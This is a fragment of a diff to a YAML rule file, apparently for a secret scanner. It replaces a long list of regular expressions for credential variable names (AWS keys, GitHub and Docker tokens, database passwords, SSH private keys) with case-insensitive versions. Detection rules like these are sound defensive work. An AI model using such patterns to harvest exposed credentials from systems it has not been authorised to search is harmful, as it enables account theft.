-          - "fossa[_-]?api[_-]?key(=| =|:| :)"
-          - "flickr[_-]?api[_-]?secret(=| =|:| :)"
-          - "flickr[_-]?api[_-]?key(=| =|:| :)"
-          - "flask[_-]?secret[_-]?key(=| =|:| :)"
-          - "firefox[_-]?secret(=| =|:| :)"
-          - "firebase[_-]?token(=| =|:| :)"
-          - "firebase[_-]?project[_-]?develop(=| =|:| :)"
-          - "firebase[_-]?key(=| =|:| :)"
-          - "firebase[_-]?api[_-]?token(=| =|:| :)"
-          - "firebase[_-]?api[_-]?json(=| =|:| :)"
-          - "file[_-]?password(=| =|:| :)"
-          - "exp[_-]?password(=| =|:| :)"
-          - "eureka[_-]?awssecretkey(=| =|:| :)"
-          - "env[_-]?sonatype[_-]?password(=| =|:| :)"
-          - "env[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
-          - "env[_-]?secret(=| =|:| :)"
-          - "env[_-]?key(=| =|:| :)"
-          - "env[_-]?heroku[_-]?api[_-]?key(=| =|:| :)"
-          - "env[_-]?github[_-]?oauth[_-]?token(=| =|:| :)"
-          - "end[_-]?user[_-]?password(=| =|:| :)"
-          - "encryption[_-]?password(=| =|:| :)"
-          - "elasticsearch[_-]?password(=| =|:| :)"
-          - "elastic[_-]?cloud[_-]?auth(=| =|:| :)"
-          - "dsonar[_-]?projectkey(=| =|:| :)"
-          - "dsonar[_-]?login(=| =|:| :)"
-          - "droplet[_-]?travis[_-]?password(=| =|:| :)"
-          - "dropbox[_-]?oauth[_-]?bearer(=| =|:| :)"
-          - "doordash[_-]?auth[_-]?token(=| =|:| :)"
-          - "dockerhubpassword(=| =|:| :)"
-          - "dockerhub[_-]?password(=| =|:| :)"
-          - "docker[_-]?token(=| =|:| :)"
-          - "docker[_-]?postgres[_-]?url(=| =|:| :)"
-          - "docker[_-]?password(=| =|:| :)"
-          - "docker[_-]?passwd(=| =|:| :)"
-          - "docker[_-]?pass(=| =|:| :)"
-          - "docker[_-]?key(=| =|:| :)"
-          - "docker[_-]?hub[_-]?password(=| =|:| :)"
-          - "digitalocean[_-]?ssh[_-]?key[_-]?ids(=| =|:| :)"
-          - "digitalocean[_-]?ssh[_-]?key[_-]?body(=| =|:| :)"
-          - "digitalocean[_-]?access[_-]?token(=| =|:| :)"
-          - "dgpg[_-]?passphrase(=| =|:| :)"
-          - "deploy[_-]?user(=| =|:| :)"
-          - "deploy[_-]?token(=| =|:| :)"
-          - "deploy[_-]?secure(=| =|:| :)"
-          - "deploy[_-]?password(=| =|:| :)"
-          - "ddgc[_-]?github[_-]?token(=| =|:| :)"
-          - "ddg[_-]?test[_-]?email[_-]?pw(=| =|:| :)"
-          - "ddg[_-]?test[_-]?email(=| =|:| :)"
-          - "db[_-]?username(=| =|:| :)"
-          - "db[_-]?user(=| =|:| :)"
-          - "db[_-]?pw(=| =|:| :)"
-          - "db[_-]?password(=| =|:| :)"
-          - "db[_-]?host(=| =|:| :)"
-          - "db[_-]?database(=| =|:| :)"
-          - "db[_-]?connection(=| =|:| :)"
-          - "datadog[_-]?app[_-]?key(=| =|:| :)"
-          - "datadog[_-]?api[_-]?key(=| =|:| :)"
-          - "database[_-]?username(=| =|:| :)"
-          - "database[_-]?user(=| =|:| :)"
-          - "database[_-]?port(=| =|:| :)"
-          - "database[_-]?password(=| =|:| :)"
-          - "database[_-]?name(=| =|:| :)"
-          - "database[_-]?host(=| =|:| :)"
-          - "danger[_-]?github[_-]?api[_-]?token(=| =|:| :)"
-          - "cypress[_-]?record[_-]?key(=| =|:| :)"
-          - "coverity[_-]?scan[_-]?token(=| =|:| :)"
-          - "coveralls[_-]?token(=| =|:| :)"
-          - "coveralls[_-]?repo[_-]?token(=| =|:| :)"
-          - "coveralls[_-]?api[_-]?token(=| =|:| :)"
-          - "cos[_-]?secrets(=| =|:| :)"
-          - "conversation[_-]?username(=| =|:| :)"
-          - "conversation[_-]?password(=| =|:| :)"
-          - "contentful[_-]?v2[_-]?access[_-]?token(=| =|:| :)"
-          - "contentful[_-]?test[_-]?org[_-]?cma[_-]?token(=| =|:| :)"
-          - "contentful[_-]?php[_-]?management[_-]?test[_-]?token(=| =|:| :)"
-          - "contentful[_-]?management[_-]?api[_-]?access[_-]?token[_-]?new(=| =|:| :)"
-          - "contentful[_-]?management[_-]?api[_-]?access[_-]?token(=| =|:| :)"
-          - "contentful[_-]?integration[_-]?management[_-]?token(=| =|:| :)"
-          - "contentful[_-]?cma[_-]?test[_-]?token(=| =|:| :)"
-          - "contentful[_-]?access[_-]?token(=| =|:| :)"
-          - "consumerkey(=| =|:| :)"
-          - "consumer[_-]?key(=| =|:| :)"
-          - "conekta[_-]?apikey(=| =|:| :)"
-          - "coding[_-]?token(=| =|:| :)"
-          - "codecov[_-]?token(=| =|:| :)"
-          - "codeclimate[_-]?repo[_-]?token(=| =|:| :)"
-          - "codacy[_-]?project[_-]?token(=| =|:| :)"
-          - "cocoapods[_-]?trunk[_-]?token(=| =|:| :)"
-          - "cocoapods[_-]?trunk[_-]?email(=| =|:| :)"
-          - "cn[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
-          - "cn[_-]?access[_-]?key[_-]?id(=| =|:| :)"
-          - "clu[_-]?ssh[_-]?private[_-]?key[_-]?base64(=| =|:| :)"
-          - "clu[_-]?repo[_-]?url(=| =|:| :)"
-          - "cloudinary[_-]?url[_-]?staging(=| =|:| :)"
-          - "cloudinary[_-]?url(=| =|:| :)"
-          - "cloudflare[_-]?email(=| =|:| :)"
-          - "cloudflare[_-]?auth[_-]?key(=| =|:| :)"
-          - "cloudflare[_-]?auth[_-]?email(=| =|:| :)"
-          - "cloudflare[_-]?api[_-]?key(=| =|:| :)"
-          - "cloudant[_-]?service[_-]?database(=| =|:| :)"
-          - "cloudant[_-]?processed[_-]?database(=| =|:| :)"
-          - "cloudant[_-]?password(=| =|:| :)"
-          - "cloudant[_-]?parsed[_-]?database(=| =|:| :)"
-          - "cloudant[_-]?order[_-]?database(=| =|:| :)"
-          - "cloudant[_-]?instance(=| =|:| :)"
-          - "cloudant[_-]?database(=| =|:| :)"
-          - "cloudant[_-]?audited[_-]?database(=| =|:| :)"
-          - "cloudant[_-]?archived[_-]?database(=| =|:| :)"
-          - "cloud[_-]?api[_-]?key(=| =|:| :)"
-          - "clojars[_-]?password(=| =|:| :)"
-          - "client[_-]?secret(=| =|:| :)"
-          - "cli[_-]?e2e[_-]?cma[_-]?token(=| =|:| :)"
-          - "claimr[_-]?token(=| =|:| :)"
-          - "claimr[_-]?superuser(=| =|:| :)"
-          - "claimr[_-]?db(=| =|:| :)"
-          - "claimr[_-]?database(=| =|:| :)"
-          - "ci[_-]?user[_-]?token(=| =|:| :)"
-          - "ci[_-]?server[_-]?name(=| =|:| :)"
-          - "ci[_-]?registry[_-]?user(=| =|:| :)"
-          - "ci[_-]?project[_-]?url(=| =|:| :)"
-          - "ci[_-]?deploy[_-]?password(=| =|:| :)"
-          - "chrome[_-]?refresh[_-]?token(=| =|:| :)"
-          - "chrome[_-]?client[_-]?secret(=| =|:| :)"
-          - "cheverny[_-]?token(=| =|:| :)"
-          - "cf[_-]?password(=| =|:| :)"
-          - "certificate[_-]?password(=| =|:| :)"
-          - "censys[_-]?secret(=| =|:| :)"
-          - "cattle[_-]?secret[_-]?key(=| =|:| :)"
-          - "cattle[_-]?agent[_-]?instance[_-]?auth(=| =|:| :)"
-          - "cattle[_-]?access[_-]?key(=| =|:| :)"
-          - "cargo[_-]?token(=| =|:| :)"
-          - "cache[_-]?s3[_-]?secret[_-]?key(=| =|:| :)"
-          - "bx[_-]?username(=| =|:| :)"
-          - "bx[_-]?password(=| =|:| :)"
-          - "bundlesize[_-]?github[_-]?token(=| =|:| :)"
-          - "built[_-]?branch[_-]?deploy[_-]?key(=| =|:| :)"
-          - "bucketeer[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
-          - "bucketeer[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)"
-          - "browserstack[_-]?access[_-]?key(=| =|:| :)"
-          - "browser[_-]?stack[_-]?access[_-]?key(=| =|:| :)"
-          - "brackets[_-]?repo[_-]?oauth[_-]?token(=| =|:| :)"
-          - "bluemix[_-]?username(=| =|:| :)"
-          - "bluemix[_-]?pwd(=| =|:| :)"
-          - "bluemix[_-]?password(=| =|:| :)"
-          - "bluemix[_-]?pass[_-]?prod(=| =|:| :)"
-          - "bluemix[_-]?pass(=| =|:| :)"
-          - "bluemix[_-]?auth(=| =|:| :)"
-          - "bluemix[_-]?api[_-]?key(=| =|:| :)"
-          - "bintraykey(=| =|:| :)"
-          - "bintray[_-]?token(=| =|:| :)"
-          - "bintray[_-]?key(=| =|:| :)"
-          - "bintray[_-]?gpg[_-]?password(=| =|:| :)"
-          - "bintray[_-]?apikey(=| =|:| :)"
-          - "bintray[_-]?api[_-]?key(=| =|:| :)"
-          - "b2[_-]?bucket(=| =|:| :)"
-          - "b2[_-]?app[_-]?key(=| =|:| :)"
-          - "awssecretkey(=| =|:| :)"
-          - "awscn[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
-          - "awscn[_-]?access[_-]?key[_-]?id(=| =|:| :)"
-          - "awsaccesskeyid(=| =|:| :)"
-          - "aws[_-]?ses[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
-          - "aws[_-]?ses[_-]?access[_-]?key[_-]?id(=| =|:| :)"
-          - "aws[_-]?secrets(=| =|:| :)"
-          - "aws[_-]?secret[_-]?key(=| =|:| :)"
-          - "aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
-          - "aws[_-]?secret(=| =|:| :)"
-          - "aws[_-]?key(=| =|:| :)"
-          - "aws[_-]?config[_-]?secretaccesskey(=| =|:| :)"
-          - "aws[_-]?config[_-]?accesskeyid(=| =|:| :)"
-          - "aws[_-]?access[_-]?key[_-]?id(=| =|:| :)"
-          - "aws[_-]?access[_-]?key(=| =|:| :)"
-          - "aws[_-]?access(=| =|:| :)"
-          - "author[_-]?npm[_-]?api[_-]?key(=| =|:| :)"
-          - "author[_-]?email[_-]?addr(=| =|:| :)"
-          - "auth0[_-]?client[_-]?secret(=| =|:| :)"
-          - "auth0[_-]?api[_-]?clientsecret(=| =|:| :)"
-          - "auth[_-]?token(=| =|:| :)"
-          - "assistant[_-]?iam[_-]?apikey(=| =|:| :)"
-          - "artifacts[_-]?secret(=| =|:| :)"
-          - "artifacts[_-]?key(=| =|:| :)"
-          - "artifacts[_-]?bucket(=| =|:| :)"
-          - "artifacts[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
-          - "artifacts[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)"
-          - "artifactory[_-]?key(=| =|:| :)"
-          - "argos[_-]?token(=| =|:| :)"
-          - "apple[_-]?id[_-]?password(=| =|:| :)"
-          - "appclientsecret(=| =|:| :)"
-          - "app[_-]?token(=| =|:| :)"
-          - "app[_-]?secrete(=| =|:| :)"
-          - "app[_-]?report[_-]?token[_-]?key(=| =|:| :)"
-          - "app[_-]?bucket[_-]?perm(=| =|:| :)"
-          - "apigw[_-]?access[_-]?token(=| =|:| :)"
-          - "apiary[_-]?api[_-]?key(=| =|:| :)"
-          - "api[_-]?secret(=| =|:| :)"
-          - "api[_-]?key[_-]?sid(=| =|:| :)"
-          - "api[_-]?key[_-]?secret(=| =|:| :)"
-          - "api[_-]?key(=| =|:| :)"
-          - "aos[_-]?sec(=| =|:| :)"
-          - "aos[_-]?key(=| =|:| :)"
-          - "ansible[_-]?vault[_-]?password(=| =|:| :)"
-          - "android[_-]?docs[_-]?deploy[_-]?token(=| =|:| :)"
-          - "anaconda[_-]?token(=| =|:| :)"
-          - "amazon[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
-          - "amazon[_-]?bucket[_-]?name(=| =|:| :)"
-          - "alicloud[_-]?secret[_-]?key(=| =|:| :)"
-          - "alicloud[_-]?access[_-]?key(=| =|:| :)"
-          - "alias[_-]?pass(=| =|:| :)"
-          - "algolia[_-]?search[_-]?key[_-]?1(=| =|:| :)"
-          - "algolia[_-]?search[_-]?key(=| =|:| :)"
-          - "algolia[_-]?search[_-]?api[_-]?key(=| =|:| :)"
-          - "algolia[_-]?api[_-]?key[_-]?search(=| =|:| :)"
-          - "algolia[_-]?api[_-]?key[_-]?mcm(=| =|:| :)"
-          - "algolia[_-]?api[_-]?key(=| =|:| :)"
-          - "algolia[_-]?admin[_-]?key[_-]?mcm(=| =|:| :)"
-          - "algolia[_-]?admin[_-]?key[_-]?2(=| =|:| :)"
-          - "algolia[_-]?admin[_-]?key[_-]?1(=| =|:| :)"
-          - "adzerk[_-]?api[_-]?key(=| =|:| :)"
-          - "admin[_-]?email(=| =|:| :)"
-          - "account[_-]?sid(=| =|:| :)"
-          - "access[_-]?token(=| =|:| :)"
-          - "access[_-]?secret(=| =|:| :)"
-          - "access[_-]?key[_-]?secret(=| =|:| :)"
\ No newline at end of file
+          - "(?i)zopim[_-]?account[_-]?key(=| =|:| :)"
+          - "(?i)zhuliang[_-]?gh[_-]?token(=| =|:| :)"
+          - "(?i)zensonatypepassword(=| =|:| :)"
+          - "(?i)zendesk[_-]?travis[_-]?github(=| =|:| :)"
+          - "(?i)yt[_-]?server[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)yt[_-]?partner[_-]?refresh[_-]?token(=| =|:| :)"
+          - "(?i)yt[_-]?partner[_-]?client[_-]?secret(=| =|:| :)"
+          - "(?i)yt[_-]?client[_-]?secret(=| =|:| :)"
+          - "(?i)yt[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)yt[_-]?account[_-]?refresh[_-]?token(=| =|:| :)"
+          - "(?i)yt[_-]?account[_-]?client[_-]?secret(=| =|:| :)"
+          - "(?i)yangshun[_-]?gh[_-]?token(=| =|:| :)"
+          - "(?i)yangshun[_-]?gh[_-]?password(=| =|:| :)"
+          - "(?i)www[_-]?googleapis[_-]?com(=| =|:| :)"
+          - "(?i)wpt[_-]?ssh[_-]?private[_-]?key[_-]?base64(=| =|:| :)"
+          - "(?i)wpt[_-]?ssh[_-]?connect(=| =|:| :)"
+          - "(?i)wpt[_-]?report[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)wpt[_-]?prepare[_-]?dir(=| =|:| :)"
+          - "(?i)wpt[_-]?db[_-]?user(=| =|:| :)"
+          - "(?i)wpt[_-]?db[_-]?password(=| =|:| :)"
+          - "(?i)wporg[_-]?password(=| =|:| :)"
+          - "(?i)wpjm[_-]?phpunit[_-]?google[_-]?geocode[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)wordpress[_-]?db[_-]?user(=| =|:| :)"
+          - "(?i)wordpress[_-]?db[_-]?password(=| =|:| :)"
+          - "(?i)wincert[_-]?password(=| =|:| :)"
+          - "(?i)widget[_-]?test[_-]?server(=| =|:| :)"
+          - "(?i)widget[_-]?fb[_-]?password[_-]?3(=| =|:| :)"
+          - "(?i)widget[_-]?fb[_-]?password[_-]?2(=| =|:| :)"
+          - "(?i)widget[_-]?fb[_-]?password(=| =|:| :)"
+          - "(?i)widget[_-]?basic[_-]?password[_-]?5(=| =|:| :)"
+          - "(?i)widget[_-]?basic[_-]?password[_-]?4(=| =|:| :)"
+          - "(?i)widget[_-]?basic[_-]?password[_-]?3(=| =|:| :)"
+          - "(?i)widget[_-]?basic[_-]?password[_-]?2(=| =|:| :)"
+          - "(?i)widget[_-]?basic[_-]?password(=| =|:| :)"
+          - "(?i)watson[_-]?password(=| =|:| :)"
+          - "(?i)watson[_-]?device[_-]?password(=| =|:| :)"
+          - "(?i)watson[_-]?conversation[_-]?password(=| =|:| :)"
+          - "(?i)wakatime[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)vscetoken(=| =|:| :)"
+          - "(?i)visual[_-]?recognition[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)virustotal[_-]?apikey(=| =|:| :)"
+          - "(?i)vip[_-]?github[_-]?deploy[_-]?key[_-]?pass(=| =|:| :)"
+          - "(?i)vip[_-]?github[_-]?deploy[_-]?key(=| =|:| :)"
+          - "(?i)vip[_-]?github[_-]?build[_-]?repo[_-]?deploy[_-]?key(=| =|:| :)"
+          - "(?i)v[_-]?sfdc[_-]?password(=| =|:| :)"
+          - "(?i)v[_-]?sfdc[_-]?client[_-]?secret(=| =|:| :)"
+          - "(?i)usertravis(=| =|:| :)"
+          - "(?i)user[_-]?assets[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)user[_-]?assets[_-]?access[_-]?key[_-]?id(=| =|:| :)"
+          - "(?i)use[_-]?ssh(=| =|:| :)"
+          - "(?i)us[_-]?east[_-]?1[_-]?elb[_-]?amazonaws[_-]?com(=| =|:| :)"
+          - "(?i)urban[_-]?secret(=| =|:| :)"
+          - "(?i)urban[_-]?master[_-]?secret(=| =|:| :)"
+          - "(?i)urban[_-]?key(=| =|:| :)"
+          - "(?i)unity[_-]?serial(=| =|:| :)"
+          - "(?i)unity[_-]?password(=| =|:| :)"
+          - "(?i)twitteroauthaccesstoken(=| =|:| :)"
+          - "(?i)twitteroauthaccesssecret(=| =|:| :)"
+          - "(?i)twitter[_-]?consumer[_-]?secret(=| =|:| :)"
+          - "(?i)twitter[_-]?consumer[_-]?key(=| =|:| :)"
+          - "(?i)twine[_-]?password(=| =|:| :)"
+          - "(?i)twilio[_-]?token(=| =|:| :)"
+          - "(?i)twilio[_-]?sid(=| =|:| :)"
+          - "(?i)twilio[_-]?configuration[_-]?sid(=| =|:| :)"
+          - "(?i)twilio[_-]?chat[_-]?account[_-]?api[_-]?service(=| =|:| :)"
+          - "(?i)twilio[_-]?api[_-]?secret(=| =|:| :)"
+          - "(?i)twilio[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)trex[_-]?okta[_-]?client[_-]?token(=| =|:| :)"
+          - "(?i)trex[_-]?client[_-]?token(=| =|:| :)"
+          - "(?i)travis[_-]?token(=| =|:| :)"
+          - "(?i)travis[_-]?secure[_-]?env[_-]?vars(=| =|:| :)"
+          - "(?i)travis[_-]?pull[_-]?request(=| =|:| :)"
+          - "(?i)travis[_-]?gh[_-]?token(=| =|:| :)"
+          - "(?i)travis[_-]?e2e[_-]?token(=| =|:| :)"
+          - "(?i)travis[_-]?com[_-]?token(=| =|:| :)"
+          - "(?i)travis[_-]?branch(=| =|:| :)"
+          - "(?i)travis[_-]?api[_-]?token(=| =|:| :)"
+          - "(?i)travis[_-]?access[_-]?token(=| =|:| :)"
+          - "(?i)token[_-]?core[_-]?java(=| =|:| :)"
+          - "(?i)thera[_-]?oss[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)tester[_-]?keys[_-]?password(=| =|:| :)"
+          - "(?i)test[_-]?test(=| =|:| :)"
+          - "(?i)test[_-]?github[_-]?token(=| =|:| :)"
+          - "(?i)tesco[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)svn[_-]?pass(=| =|:| :)"
+          - "(?i)surge[_-]?token(=| =|:| :)"
+          - "(?i)surge[_-]?login(=| =|:| :)"
+          - "(?i)stripe[_-]?public(=| =|:| :)"
+          - "(?i)stripe[_-]?private(=| =|:| :)"
+          - "(?i)strip[_-]?secret[_-]?key(=| =|:| :)"
+          - "(?i)strip[_-]?publishable[_-]?key(=| =|:| :)"
+          - "(?i)stormpath[_-]?api[_-]?key[_-]?secret(=| =|:| :)"
+          - "(?i)stormpath[_-]?api[_-]?key[_-]?id(=| =|:| :)"
+          - "(?i)starship[_-]?auth[_-]?token(=| =|:| :)"
+          - "(?i)starship[_-]?account[_-]?sid(=| =|:| :)"
+          - "(?i)star[_-]?test[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)star[_-]?test[_-]?location(=| =|:| :)"
+          - "(?i)star[_-]?test[_-]?bucket(=| =|:| :)"
+          - "(?i)star[_-]?test[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)"
+          - "(?i)staging[_-]?base[_-]?url[_-]?runscope(=| =|:| :)"
+          - "(?i)ssmtp[_-]?config(=| =|:| :)"
+          - "(?i)sshpass(=| =|:| :)"
+          - "(?i)srcclr[_-]?api[_-]?token(=| =|:| :)"
+          - "(?i)square[_-]?reader[_-]?sdk[_-]?repository[_-]?password(=| =|:| :)"
+          - "(?i)sqssecretkey(=| =|:| :)"
+          - "(?i)sqsaccesskey(=| =|:| :)"
+          - "(?i)spring[_-]?mail[_-]?password(=| =|:| :)"
+          - "(?i)spotify[_-]?api[_-]?client[_-]?secret(=| =|:| :)"
+          - "(?i)spotify[_-]?api[_-]?access[_-]?token(=| =|:| :)"
+          - "(?i)spaces[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)spaces[_-]?access[_-]?key[_-]?id(=| =|:| :)"
+          - "(?i)soundcloud[_-]?password(=| =|:| :)"
+          - "(?i)soundcloud[_-]?client[_-]?secret(=| =|:| :)"
+          - "(?i)sonatypepassword(=| =|:| :)"
+          - "(?i)sonatype[_-]?token[_-]?user(=| =|:| :)"
+          - "(?i)sonatype[_-]?token[_-]?password(=| =|:| :)"
+          - "(?i)sonatype[_-]?password(=| =|:| :)"
+          - "(?i)sonatype[_-]?pass(=| =|:| :)"
+          - "(?i)sonatype[_-]?nexus[_-]?password(=| =|:| :)"
+          - "(?i)sonatype[_-]?gpg[_-]?passphrase(=| =|:| :)"
+          - "(?i)sonatype[_-]?gpg[_-]?key[_-]?name(=| =|:| :)"
+          - "(?i)sonar[_-]?token(=| =|:| :)"
+          - "(?i)sonar[_-]?project[_-]?key(=| =|:| :)"
+          - "(?i)sonar[_-]?organization[_-]?key(=| =|:| :)"
+          - "(?i)socrata[_-]?password(=| =|:| :)"
+          - "(?i)socrata[_-]?app[_-]?token(=| =|:| :)"
+          - "(?i)snyk[_-]?token(=| =|:| :)"
+          - "(?i)snyk[_-]?api[_-]?token(=| =|:| :)"
+          - "(?i)snoowrap[_-]?refresh[_-]?token(=| =|:| :)"
+          - "(?i)snoowrap[_-]?password(=| =|:| :)"
+          - "(?i)snoowrap[_-]?client[_-]?secret(=| =|:| :)"
+          - "(?i)slate[_-]?user[_-]?email(=| =|:| :)"
+          - "(?i)slash[_-]?developer[_-]?space[_-]?key(=| =|:| :)"
+          - "(?i)slash[_-]?developer[_-]?space(=| =|:| :)"
+          - "(?i)signing[_-]?key[_-]?sid(=| =|:| :)"
+          - "(?i)signing[_-]?key[_-]?secret(=| =|:| :)"
+          - "(?i)signing[_-]?key[_-]?password(=| =|:| :)"
+          - "(?i)signing[_-]?key(=| =|:| :)"
+          - "(?i)setsecretkey(=| =|:| :)"
+          - "(?i)setdstsecretkey(=| =|:| :)"
+          - "(?i)setdstaccesskey(=| =|:| :)"
+          - "(?i)ses[_-]?secret[_-]?key(=| =|:| :)"
+          - "(?i)ses[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)service[_-]?account[_-]?secret(=| =|:| :)"
+          - "(?i)sentry[_-]?key(=| =|:| :)"
+          - "(?i)sentry[_-]?secret(=| =|:| :)"
+          - "(?i)sentry[_-]?endpoint(=| =|:| :)"
+          - "(?i)sentry[_-]?default[_-]?org(=| =|:| :)"
+          - "(?i)sentry[_-]?auth[_-]?token(=| =|:| :)"
+          - "(?i)sendwithus[_-]?key(=| =|:| :)"
+          - "(?i)sendgrid[_-]?username(=| =|:| :)"
+          - "(?i)sendgrid[_-]?user(=| =|:| :)"
+          - "(?i)sendgrid[_-]?password(=| =|:| :)"
+          - "(?i)sendgrid[_-]?key(=| =|:| :)"
+          - "(?i)sendgrid[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)sendgrid(=| =|:| :)"
+          - "(?i)selion[_-]?selenium[_-]?host(=| =|:| :)"
+          - "(?i)selion[_-]?log[_-]?level[_-]?dev(=| =|:| :)"
+          - "(?i)segment[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)secretkey(=| =|:| :)"
+          - "(?i)secretaccesskey(=| =|:| :)"
+          - "(?i)secret[_-]?key[_-]?base(=| =|:| :)"
+          - "(?i)secret[_-]?9(=| =|:| :)"
+          - "(?i)secret[_-]?8(=| =|:| :)"
+          - "(?i)secret[_-]?7(=| =|:| :)"
+          - "(?i)secret[_-]?6(=| =|:| :)"
+          - "(?i)secret[_-]?5(=| =|:| :)"
+          - "(?i)secret[_-]?4(=| =|:| :)"
+          - "(?i)secret[_-]?3(=| =|:| :)"
+          - "(?i)secret[_-]?2(=| =|:| :)"
+          - "(?i)secret[_-]?11(=| =|:| :)"
+          - "(?i)secret[_-]?10(=| =|:| :)"
+          - "(?i)secret[_-]?1(=| =|:| :)"
+          - "(?i)secret[_-]?0(=| =|:| :)"
+          - "(?i)sdr[_-]?token(=| =|:| :)"
+          - "(?i)scrutinizer[_-]?token(=| =|:| :)"
+          - "(?i)sauce[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)sandbox[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)sandbox[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)"
+          - "(?i)sandbox[_-]?access[_-]?token(=| =|:| :)"
+          - "(?i)salesforce[_-]?bulk[_-]?test[_-]?security[_-]?token(=| =|:| :)"
+          - "(?i)salesforce[_-]?bulk[_-]?test[_-]?password(=| =|:| :)"
+          - "(?i)sacloud[_-]?api(=| =|:| :)"
+          - "(?i)sacloud[_-]?access[_-]?token[_-]?secret(=| =|:| :)"
+          - "(?i)sacloud[_-]?access[_-]?token(=| =|:| :)"
+          - "(?i)s3[_-]?user[_-]?secret(=| =|:| :)"
+          - "(?i)s3[_-]?secret[_-]?key(=| =|:| :)"
+          - "(?i)s3[_-]?secret[_-]?assets(=| =|:| :)"
+          - "(?i)s3[_-]?secret[_-]?app[_-]?logs(=| =|:| :)"
+          - "(?i)s3[_-]?key[_-]?assets(=| =|:| :)"
+          - "(?i)s3[_-]?key[_-]?app[_-]?logs(=| =|:| :)"
+          - "(?i)s3[_-]?key(=| =|:| :)"
+          - "(?i)s3[_-]?external[_-]?3[_-]?amazonaws[_-]?com(=| =|:| :)"
+          - "(?i)s3[_-]?bucket[_-]?name[_-]?assets(=| =|:| :)"
+          - "(?i)s3[_-]?bucket[_-]?name[_-]?app[_-]?logs(=| =|:| :)"
+          - "(?i)s3[_-]?access[_-]?key[_-]?id(=| =|:| :)"
+          - "(?i)s3[_-]?access[_-]?key(=| =|:| :)"
+          - "(?i)rubygems[_-]?auth[_-]?token(=| =|:| :)"
+          - "(?i)rtd[_-]?store[_-]?pass(=| =|:| :)"
+          - "(?i)rtd[_-]?key[_-]?pass(=| =|:| :)"
+          - "(?i)route53[_-]?access[_-]?key[_-]?id(=| =|:| :)"
+          - "(?i)ropsten[_-]?private[_-]?key(=| =|:| :)"
+          - "(?i)rinkeby[_-]?private[_-]?key(=| =|:| :)"
+          - "(?i)rest[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)repotoken(=| =|:| :)"
+          - "(?i)reporting[_-]?webdav[_-]?url(=| =|:| :)"
+          - "(?i)reporting[_-]?webdav[_-]?pwd(=| =|:| :)"
+          - "(?i)release[_-]?token(=| =|:| :)"
+          - "(?i)release[_-]?gh[_-]?token(=| =|:| :)"
+          - "(?i)registry[_-]?secure(=| =|:| :)"
+          - "(?i)registry[_-]?pass(=| =|:| :)"
+          - "(?i)refresh[_-]?token(=| =|:| :)"
+          - "(?i)rediscloud[_-]?url(=| =|:| :)"
+          - "(?i)redis[_-]?stunnel[_-]?urls(=| =|:| :)"
+          - "(?i)randrmusicapiaccesstoken(=| =|:| :)"
+          - "(?i)rabbitmq[_-]?password(=| =|:| :)"
+          - "(?i)quip[_-]?token(=| =|:| :)"
+          - "(?i)qiita[_-]?token(=| =|:| :)"
+          - "(?i)pypi[_-]?passowrd(=| =|:| :)"
+          - "(?i)pushover[_-]?token(=| =|:| :)"
+          - "(?i)publish[_-]?secret(=| =|:| :)"
+          - "(?i)publish[_-]?key(=| =|:| :)"
+          - "(?i)publish[_-]?access(=| =|:| :)"
+          - "(?i)project[_-]?config(=| =|:| :)"
+          - "(?i)prod[_-]?secret[_-]?key(=| =|:| :)"
+          - "(?i)prod[_-]?password(=| =|:| :)"
+          - "(?i)prod[_-]?access[_-]?key[_-]?id(=| =|:| :)"
+          - "(?i)private[_-]?signing[_-]?password(=| =|:| :)"
+          - "(?i)pring[_-]?mail[_-]?username(=| =|:| :)"
+          - "(?i)preferred[_-]?username(=| =|:| :)"
+          - "(?i)prebuild[_-]?auth(=| =|:| :)"
+          - "(?i)postgresql[_-]?pass(=| =|:| :)"
+          - "(?i)postgresql[_-]?db(=| =|:| :)"
+          - "(?i)postgres[_-]?env[_-]?postgres[_-]?password(=| =|:| :)"
+          - "(?i)postgres[_-]?env[_-]?postgres[_-]?db(=| =|:| :)"
+          - "(?i)plugin[_-]?password(=| =|:| :)"
+          - "(?i)plotly[_-]?apikey(=| =|:| :)"
+          - "(?i)places[_-]?apikey(=| =|:| :)"
+          - "(?i)places[_-]?api[_-]?key(=| =|:| :)"
+          - "(?i)pg[_-]?host(=| =|:| :)"
+          - "(?i)pg[_-]?database(=| =|:| :)"
+          - "(?i)personal[_-]?secret(=| =|:| :)"
+          - "(?i)personal[_-]?key(=| =|:| :)"
+          - "(?i)percy[_-]?token(=| =|:| :)"
+          - "(?i)percy[_-]?project(=| =|:| :)"
+          - "(?i)paypal[_-]?client[_-]?secret(=| =|:| :)"
+          - "(?i)passwordtravis(=| =|:| :)"
+          - "(?i)parse[_-]?js[_-]?key(=| =|:| :)"
+          - "(?i)pagerduty[_-]?apikey(=| =|:| :)"
+          - "(?i)packagecloud[_-]?token(=| =|:| :)"
+          - "(?i)ossrh[_-]?username(=| =|:| :)"
